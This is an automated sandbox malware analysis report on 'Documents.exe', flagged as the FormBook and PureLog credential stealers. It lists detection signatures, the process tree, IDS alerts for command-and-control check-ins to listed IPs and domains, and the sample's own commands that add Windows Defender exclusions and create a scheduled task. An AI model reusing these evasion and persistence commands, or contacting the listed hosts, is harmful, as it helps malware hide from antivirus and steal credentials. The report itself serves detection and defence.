Windows Analysis Report
Documents.exe

Overview

General Information

Sample name: Documents.exe
Analysis ID: 1564384
MD5: 0c0b6ed60e0309998da4ae71469f1d84
SHA1: 030176b42aac8f2fd5e0358e817491d3c334a686
SHA256: 83b760b0b764a209333a2b903015ff3f6df831faf20be20b836563c54e3370b1
Tags: exe, user-lowmal3
Infos:

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Documents.exe (PID: 6392 cmdline: "C:\Users\user\Desktop\Documents.exe" MD5: 0C0B6ED60E0309998DA4AE71469F1D84)
    • powershell.exe (PID: 5780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1292 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uFEeKIucsX.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6460 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 3224 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • vWFGbvOdxI.exe (PID: 1788 cmdline: "C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • systray.exe (PID: 1076 cmdline: "C:\Windows\SysWOW64\systray.exe" MD5: 28D565BB24D30E5E3DE8AFF6900AF098)
          • vWFGbvOdxI.exe (PID: 2848 cmdline: "C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4072 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • uFEeKIucsX.exe (PID: 1848 cmdline: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe MD5: 0C0B6ED60E0309998DA4AE71469F1D84)
    • schtasks.exe (PID: 7064 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp4E47.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 5052 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 00000000.00000002.2156644192.0000000004359000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 00000011.00000002.4500125760.00000000042A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 00000011.00000002.4498734635.0000000000600000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 00000000.00000002.2160027953.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 00000011.00000002.4500198635.00000000042F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 0.2.Documents.exe.5bd0000.3.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 0.2.Documents.exe.5bd0000.3.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 9.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 9.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Documents.exe", ParentImage: C:\Users\user\Desktop\Documents.exe, ParentProcessId: 6392, ParentProcessName: Documents.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe", ProcessId: 5780, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp4E47.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp4E47.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe, ParentImage: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe, ParentProcessId: 1848, ParentProcessName: uFEeKIucsX.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp4E47.tmp", ProcessId: 7064, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Documents.exe", ParentImage: C:\Users\user\Desktop\Documents.exe, ParentProcessId: 6392, ParentProcessName: Documents.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp", ProcessId: 6460, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Documents.exe", ParentImage: C:\Users\user\Desktop\Documents.exe, ParentProcessId: 6392, ParentProcessName: Documents.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe", ProcessId: 5780, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Documents.exe", ParentImage: C:\Users\user\Desktop\Documents.exe, ParentProcessId: 6392, ParentProcessName: Documents.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp", ProcessId: 6460, ProcessName: schtasks.exe

| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2024-11-28T09:14:09.542330+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49809 | 162.0.215.33 | 80 | TCP |
| 2024-11-28T09:14:12.420519+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49818 | 162.0.215.33 | 80 | TCP |
| 2024-11-28T09:14:14.958104+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49825 | 162.0.215.33 | 80 | TCP |
| 2024-11-28T09:14:24.466710+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49847 | 104.18.73.116 | 80 | TCP |
| 2024-11-28T09:14:27.132228+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49852 | 104.18.73.116 | 80 | TCP |
| 2024-11-28T09:14:29.852129+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49859 | 104.18.73.116 | 80 | TCP |
| 2024-11-28T09:14:39.904886+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49882 | 192.185.147.100 | 80 | TCP |
| 2024-11-28T09:14:42.540436+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49888 | 192.185.147.100 | 80 | TCP |
| 2024-11-28T09:14:45.186578+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49894 | 192.185.147.100 | 80 | TCP |
| 2024-11-28T09:14:54.482114+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49917 | 13.248.169.48 | 80 | TCP |
| 2024-11-28T09:14:57.153122+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49924 | 13.248.169.48 | 80 | TCP |
| 2024-11-28T09:14:59.864734+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49930 | 13.248.169.48 | 80 | TCP |
| 2024-11-28T09:15:09.062744+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49952 | 3.33.130.190 | 80 | TCP |
| 2024-11-28T09:15:11.765225+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49959 | 3.33.130.190 | 80 | TCP |
| 2024-11-28T09:15:14.795351+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49965 | 3.33.130.190 | 80 | TCP |
| 2024-11-28T09:15:23.873450+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49984 | 172.67.222.69 | 80 | TCP |
| 2024-11-28T09:15:26.488292+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49991 | 172.67.222.69 | 80 | TCP |
| 2024-11-28T09:15:29.245975+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49999 | 172.67.222.69 | 80 | TCP |
| 2024-11-28T09:15:39.491584+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50007 | 103.249.106.91 | 80 | TCP |
| 2024-11-28T09:15:42.170839+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50008 | 103.249.106.91 | 80 | TCP |
| 2024-11-28T09:15:44.842297+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50009 | 103.249.106.91 | 80 | TCP |
| 2024-11-28T09:15:55.805631+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50011 | 121.43.155.35 | 80 | TCP |
| 2024-11-28T09:15:58.512412+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50012 | 121.43.155.35 | 80 | TCP |
| 2024-11-28T09:16:01.158695+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50013 | 121.43.155.35 | 80 | TCP |
| 2024-11-28T09:16:11.036905+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50015 | 199.192.23.123 | 80 | TCP |
| 2024-11-28T09:16:13.717053+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50016 | 199.192.23.123 | 80 | TCP |
| 2024-11-28T09:16:16.456673+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50017 | 199.192.23.123 | 80 | TCP |
| 2024-11-28T09:16:26.085634+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50019 | 52.60.87.163 | 80 | TCP |
| 2024-11-28T09:16:28.752419+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50020 | 52.60.87.163 | 80 | TCP |
| 2024-11-28T09:16:31.380140+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50021 | 52.60.87.163 | 80 | TCP |
| 2024-11-28T09:16:41.545133+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50023 | 161.97.142.144 | 80 | TCP |
| 2024-11-28T09:16:43.984151+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50024 | 161.97.142.144 | 80 | TCP |
| 2024-11-28T09:16:46.603798+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50025 | 161.97.142.144 | 80 | TCP |
| 2024-11-28T09:16:56.364697+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50027 | 75.2.103.23 | 80 | TCP |
| 2024-11-28T09:16:58.982905+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50028 | 75.2.103.23 | 80 | TCP |
| 2024-11-28T09:17:01.737260+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50029 | 75.2.103.23 | 80 | TCP |
| 2024-11-28T09:17:11.556796+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50031 | 13.248.169.48 | 80 | TCP |
| 2024-11-28T09:17:14.660402+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50032 | 13.248.169.48 | 80 | TCP |

AV Detection

Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe, ReversingLabs: Detection: 23%
Source: Documents.exe, ReversingLabs: Detection: 23%
Source: Yara match, File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000011.00000002.4500125760.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.4498734635.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.4500198635.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000002.4502147682.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.2340363739.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.2342055723.00000000019E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe, Joe Sandbox ML: detected
Source: Documents.exe, Joe Sandbox ML: detected
Source: Documents.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Documents.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: systray.pdb source: RegSvcs.exe, 00000009.00000002.2340231400.0000000001058000.00000004.00000020.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000010.00000002.4499291759.0000000000B18000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 00000009.00000002.2340231400.0000000001058000.00000004.00000020.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000010.00000002.4499291759.0000000000B18000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vWFGbvOdxI.exe, 00000010.00000002.4499807449.0000000000E2E000.00000002.00000001.01000000.0000000D.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4499818518.0000000000E2E000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: RegSvcs.pdb, source: systray.exe, 00000011.00000002.4498880450.00000000006C2000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500910385.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000002C8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2632346908.0000000030C3C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500442013.0000000004510000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2341815008.000000000435E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2340058980.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500442013.00000000046AE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500442013.0000000004510000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2341815008.000000000435E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2340058980.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500442013.00000000046AE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: systray.exe, 00000011.00000002.4498880450.00000000006C2000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500910385.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000002C8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2632346908.0000000030C3C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Documents.exe, Code function: 4x nop then jmp 05F1D0C1h, 0_2_05F1D22F

Networking

Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49818 -> 162.0.215.33:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49809 -> 162.0.215.33:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49847 -> 104.18.73.116:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49825 -> 162.0.215.33:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49888 -> 192.185.147.100:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49859 -> 104.18.73.116:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49952 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49894 -> 192.185.147.100:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49959 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49984 -> 172.67.222.69:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49924 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 172.67.222.69:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49930 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 103.249.106.91:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 103.249.106.91:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 103.249.106.91:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 172.67.222.69:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 121.43.155.35:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 121.43.155.35:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 199.192.23.123:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 52.60.87.163:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50028 -> 75.2.103.23:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 52.60.87.163:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 161.97.142.144:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 161.97.142.144:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50032 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50031 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 199.192.23.123:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 199.192.23.123:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 161.97.142.144:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49852 -> 104.18.73.116:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50027 -> 75.2.103.23:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 121.43.155.35:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49882 -> 192.185.147.100:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 52.60.87.163:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49965 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50029 -> 75.2.103.23:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49917 -> 13.248.169.48:80
Source: DNS query: www.6822662.xyz
Source: DNS query: www.lingdianyun29.xyz
Source: DNS query: www.030002449.xyz
Source: Joe Sandbox View, IP Address: 162.0.215.33
Source: Joe Sandbox View, IP Address: 13.248.169.48
Source: Joe Sandbox View, ASN Name: ACPCA
Source: Joe Sandbox View, ASN Name: AMAZON-02US
Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected:
